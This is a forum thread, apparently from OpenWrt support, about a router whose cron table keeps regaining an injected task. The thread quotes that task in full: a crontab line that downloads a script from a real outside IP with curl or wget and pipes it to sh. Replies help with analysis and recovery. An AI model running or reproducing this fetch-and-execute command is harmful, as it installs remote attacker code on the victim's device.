Has my router been hacked?

Good evening,

I noticed a couple of days ago that a scheduled task had stopped running. On checking LuCI, the task had been removed and the following was in its place:-

21 * * * * sh -c '( curl http://45.125.131.17/df2vGJJ58ivF -sk || wget http://45.125.131.17/df2vGJJ58ivF -O -)| sh'

I deleted it, but it's re-appeared. I've installed BanIP and changed root's password, but it keeps re-appearing. The IP is in Thailand.

Can anyone shed any light on what's going on?

Thank you!

1 Like

Deleted the task, now this has appeared:-

49 * * * * sh -c '( curl http://45.125.131.17/df2vGJJ58ivF -sk || wget http://45.125.131.17/df2vGJJ58ivF -O -)| sh'

Resolves to apnic dot net.

Is that your ISP?

No my ISP is Spectrum (Charter) in the USA.

Shut down the device you used to delete the script and see what happens if you delete it on another machine.

What is the output of the following:

ubus call system board

That's definitely malicious. It will fetch and execute arbitrary code from the remote location.

It's very likely that malware has been inserted other places in the router's filesystem. Using a known-clean PC (never has been connected to this router or online) re-flash the router without saving settings then set a secure password and reconfigure it.

3 Likes

We need to figure out which device(s) have the credentials to log back into LuCI, or CLI the script.

wget is a download app that will download, restart after being suspended and do it in the background.

1 Like

Looks like somebody installed or tried to install a crypto miner on your router lol


{
        "kernel": "5.10.161",
        "hostname": "OpenWrt",
        "system": "ARMv8 Processor rev 3",
        "model": "Raspberry Pi Compute Module 4 Rev 1.0",
        "board_name": "raspberrypi,4-compute-module",
        "rootfs_type": "ext4",
        "release": {
                "distribution": "OpenWrt",
                "version": "22.03.3",
                "revision": "r20028-43d71ad93e",
                "target": "bcm27xx/bcm2711",
                "description": "OpenWrt 22.03.3 r20028-43d71ad93e"
        }
}

I stopped the cron service and the task hasn’t reappeared.

I have a backup from before it was hacked. Would that be ok?

Start by upgrading your device. 22.03.3 does have known issues, so at least upgrade to 22.03.6 (latest for the 22.03 series). Recommended would be to upgrade to 23.05.2. Both of these will have the most up-to-date security patches.

Regarding the backup files -- I'd restore them manually -- and examine each file. The key files are usually:

/etc/config/network
/etc/config/dhcp
/etc/config/wireless
/etc/config/firewall

Plus any that are for specific packages you're running.

Make a backup of the current system, too -- you may want to examine those files to see what might be going on (once you can do it safely on a different machine and have a secure router again).

3 Likes

This may not be too pernicious as it appears that the primary intent is to download a binary which most likely mines crypto and posts any profitable results to another server. The binary (named amd64) is placed in a hidden directory that starts with .systemd-private- under either /var/tmp, $HOME, or /tmp

1 Like

Thank you for the instructions. It’s greatly appreciated.

1 Like

Very interesting. The question is how did they get access to my router?

2 Likes

One of the interesting things here is that this is one of the first times that I can recall seeing an OpenWrt device that was legitimately hacked or otherwise doing something that is not normal.

I am not sufficiently well versed in deconstructing stuff of this type to be able to actually say if this was a hack due to a vulnerability vs something hidden in a package that may have been installed by the OP at some point, or some other explanation. However, this behavior is almost certainly not normal nor is it expected for OpenWrt in general. I cannot personally speak to the content/purpose of this particular code, either -- this is well outside my area of expertise.

In the vast majority of "has my router been hacked" type threads, it turns out to be normal processes that are misunderstood by the posters (for example, NTP syncs or other similar processes that are mistaken for 'phone home' routines or otherwise assumed to be potentially malicious).

@jupiterx64 - when you reinstall your packages and config files, it makes sense to ensure that any tutorials you are following or configurations you put in place are well vetted. If there are any questions along the way, feel free to ask.

5 Likes

Yes, I completely agree with you. I'll review the installed packages. The other possibility is a weak root password.

As for the versions of OpenWRT to install, I’m very limited due to the hardware.

The only ones available are listed here https://1drv.ms/u/s!AqG2uRmVUhlSh0NHMLMmQKLyASvi?e=mup3cd

Thank you again!

Are you 100% certain you can trust the build you are using? Is there accountability and transparency of that build?

What about firmware from the official project??

https://firmware-selector.openwrt.org/?version=23.05.2&target=bcm27xx%2Fbcm2711&id=rpi-4